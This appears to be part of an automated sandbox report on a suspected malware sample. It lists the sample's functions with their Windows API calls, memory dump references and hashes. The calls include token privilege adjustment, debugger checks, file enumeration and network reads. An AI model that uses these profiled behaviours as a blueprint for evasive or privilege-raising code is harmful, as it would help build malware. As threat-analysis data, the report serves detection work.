                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00752107
                                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0075210E
                                                                                                                                                                                                                                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 00752127
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00751C81), ref: 0075213B
                                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00752142
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3008561057-0
                                                                                                                                                                                                                                                                              • Opcode ID: 7374df469993fa4e1b3ddbeffd3f63337a692532f5c18bd304c8965cebe4946c
                                                                                                                                                                                                                                                                              • Instruction ID: c88c50c75bc19b75b3132470c404483fd643a2fc273918bfe12d93c0224e4130
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7374df469993fa4e1b3ddbeffd3f63337a692532f5c18bd304c8965cebe4946c
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F11DC71941608FFDB249BA4CC08BEF7BB9EF52356F208018E941931A1D779AD0ACB64
                                                                                                                                                                                                                                                                              Function 0076A570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0076A5BD
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0076A6D0
                                                                                                                                                                                                                                                                                • Part of subcall function 007642B9: GetInputState.USER32 ref: 00764310
                                                                                                                                                                                                                                                                                • Part of subcall function 007642B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007643AB
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0076A5ED
                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0076A6BA
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                                                                                                                              • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                                                              • Opcode ID: d1dd13b0ef846fa0a8ba84174c6b2829aeb240a768cc4d802ecf96465360adec
                                                                                                                                                                                                                                                                              • Instruction ID: ea9a62ad4db28da469065f24ef3385dd5a3ba4b5adbae53c6e6ad28008512510
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1dd13b0ef846fa0a8ba84174c6b2829aeb240a768cc4d802ecf96465360adec
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9041827194020EEFCF54EFA4C949AEEBBB5EF04310F24405AE806B2191EB349E54CF65
                                                                                                                                                                                                                                                                              Function 00772263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00773AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00773AD7
                                                                                                                                                                                                                                                                                • Part of subcall function 00773AAB: _wcslen.LIBCMT ref: 00773AF8
                                                                                                                                                                                                                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 007722BA
                                                                                                                                                                                                                                                                              • WSAGetLastError.WSOCK32 ref: 007722E1
                                                                                                                                                                                                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00772338
                                                                                                                                                                                                                                                                              • WSAGetLastError.WSOCK32 ref: 00772343
                                                                                                                                                                                                                                                                              • closesocket.WSOCK32(00000000), ref: 00772372
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1601658205-0
                                                                                                                                                                                                                                                                              • Opcode ID: 90392b16d44e3b0987a86defd29e3352034d00e2a4c4e4ad8d0ae61dbc67795f
                                                                                                                                                                                                                                                                              • Instruction ID: fe707ef321e1d4e4a34b2d3f56ff389fd79ebf213fb50bc3b216735495f6999e
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90392b16d44e3b0987a86defd29e3352034d00e2a4c4e4ad8d0ae61dbc67795f
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A51D571A002149FEB10AF24C886F2A77E5AB05758F54C48CF9199B3D3C775EC4287A1
                                                                                                                                                                                                                                                                              Function 007826DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 292994002-0
                                                                                                                                                                                                                                                                              • Opcode ID: b420512585dc4084e9005b6dd737f90ac3f8b4f1da706907c6d4094f2a612b90
                                                                                                                                                                                                                                                                              • Instruction ID: b810ffea74eea6835816ba36ff5342bc40644fe1aca621f80d4e496cb700771a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b420512585dc4084e9005b6dd737f90ac3f8b4f1da706907c6d4094f2a612b90
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 832105317802108FD720AF27C844B1A7BE5EF84312B18806DE94ACB252D779DC43CB94
                                                                                                                                                                                                                                                                              Function 0076D889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • InternetReadFile.WININET(?,?,00000400,?), ref: 0076D8CE
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 0076D92F
                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,00000000), ref: 0076D943
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 234945975-0
                                                                                                                                                                                                                                                                              • Opcode ID: 0911aef6b99562aa94fd4f3266bc2121ae1c257628bbee97eb9c8c7751674a2e
                                                                                                                                                                                                                                                                              • Instruction ID: 56e822c4edda8fb612fe354671c80493685b55c5e32b30a0c0673899e610e1dc
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0911aef6b99562aa94fd4f3266bc2121ae1c257628bbee97eb9c8c7751674a2e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A219071A10705EFE7309F65D888BAAB7FCEB40314F10841DE94692191E778FE45CB54
                                                                                                                                                                                                                                                                              Function 0075E472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,007346AC), ref: 0075E482
                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 0075E491
                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0075E4A2
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0075E4AE
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2695905019-0
                                                                                                                                                                                                                                                                              • Opcode ID: 54216e6ce806cccb1100a1d45806c82f450adf8ad1b374195488a46c43d41075
                                                                                                                                                                                                                                                                              • Instruction ID: 02311aea4997eda3250a20d6df9bd449fd8744e2a18ff8f6ce3be1c9df63d314
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54216e6ce806cccb1100a1d45806c82f450adf8ad1b374195488a46c43d41075
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7FF0A03081091057D62467B8AC0D8AA77ADBE02336B608701FCB6C20E0D7BC9E998699
                                                                                                                                                                                                                                                                              Function 0074E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: LocalTime
                                                                                                                                                                                                                                                                              • String ID: %.3d$X64
                                                                                                                                                                                                                                                                              • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                                                              • Opcode ID: 4c70eaddacb94789181f9c40692e6380dbdbbd0e37bda7a0dd24192936f92eda
                                                                                                                                                                                                                                                                              • Instruction ID: 62e3f8b21005c26926fe4388c95c1caa0a9bb5547760a68fbfe2401dcaa4eebe
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c70eaddacb94789181f9c40692e6380dbdbbd0e37bda7a0dd24192936f92eda
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18D05BB1C08108E6CBD0D790DC4CDBD73BCBB18310F258956F906D1040E73C99049727
                                                                                                                                                                                                                                                                              Function 00722992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00722A8A
                                                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00722A94
                                                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00722AA1
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                              • Opcode ID: f5d4a5d19570f4cdf86afdafa922ffc7008a7ed70751bd2c2b19cae3ad5c42c7
                                                                                                                                                                                                                                                                              • Instruction ID: 0211927bd5fcb86b65b22463f3fe8c819b8400e81661255976da4c3380f8fe3c
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5d4a5d19570f4cdf86afdafa922ffc7008a7ed70751bd2c2b19cae3ad5c42c7
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9831D77494122CABCB21DF68D9887DCBBB4BF18310F5081DAE80CA6291E7749FC58F45
                                                                                                                                                                                                                                                                              Function 00752010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 0071014B: __CxxThrowException@8.LIBVCRUNTIME ref: 007109D8
                                                                                                                                                                                                                                                                                • Part of subcall function 0071014B: __CxxThrowException@8.LIBVCRUNTIME ref: 007109F5
                                                                                                                                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0075205A
                                                                                                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00752087
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00752097
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 577356006-0
                                                                                                                                                                                                                                                                              • Opcode ID: 3e4a98f475476baa0f7c3871c5311e33e1babf4591a3912d66630723884353a7
                                                                                                                                                                                                                                                                              • Instruction ID: b6391b4ba97262ef37706e587027cd888d52c94909ef90970e1ab0e0dc2eeb29
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e4a98f475476baa0f7c3871c5311e33e1babf4591a3912d66630723884353a7
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3411B2B2400304FFD728AF54DC86DABB7B8FB05711B20841EE44657291EBB8BC86CB64
                                                                                                                                                                                                                                                                              Function 00715058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,0071502E,?,007B98D8,0000000C,00715185,?,00000002,00000000), ref: 00715079
                                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,0071502E,?,007B98D8,0000000C,00715185,?,00000002,00000000), ref: 00715080
                                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00715092
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                              • Opcode ID: af1c342bd6754f28d62e881359fbe016081dbdafa0b0e0b99b4f9b7cf168f639
                                                                                                                                                                                                                                                                              • Instruction ID: a0de5718a3dac8344b9b482c275682d95fb1c5dadf7ac1cab4b3721fadd1795a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: af1c342bd6754f28d62e881359fbe016081dbdafa0b0e0b99b4f9b7cf168f639
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39E0BF31440548EFCF256FA4DD0DE983B69EF55345F118014F845965A1DB3DDD81CBC4
                                                                                                                                                                                                                                                                              Function 0074E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetUserNameW.ADVAPI32(?,?), ref: 0074E664
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: NameUser
                                                                                                                                                                                                                                                                              • String ID: X64
                                                                                                                                                                                                                                                                              • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                                                              • Opcode ID: cc6ccbf4cba99eee729d8b1498fec1e8f0f8a625a6b4234e78b7ccff50bd73b6
                                                                                                                                                                                                                                                                              • Instruction ID: 0df93b05bbd4a6a9c1bde3206872bb144443b16055a57a6b2ced931cb62b8e66
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc6ccbf4cba99eee729d8b1498fec1e8f0f8a625a6b4234e78b7ccff50bd73b6
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BCD0C9B480511DEACB90CB90EC88DD973BCBB04304F104A51F106A2040D73895488B24
                                                                                                                                                                                                                                                                              Function 007641FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,007752EE,?,?,00000035,?), ref: 00764229
                                                                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,007752EE,?,?,00000035,?), ref: 00764239
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                              • Opcode ID: 243d29988c02cc47adb1da852e5f1b475a311b676f928f4cbcba812a4a2a69d1
                                                                                                                                                                                                                                                                              • Instruction ID: db6beba3330973ab6508777fe5d3ab33daf8202aa1b64eafd45f32c8ad5c7e31
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 243d29988c02cc47adb1da852e5f1b475a311b676f928f4cbcba812a4a2a69d1
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6BF0E5716402286AE72016A5EC4DFEB376EFFC5761F100175F505D21C5D9749D00C7B0
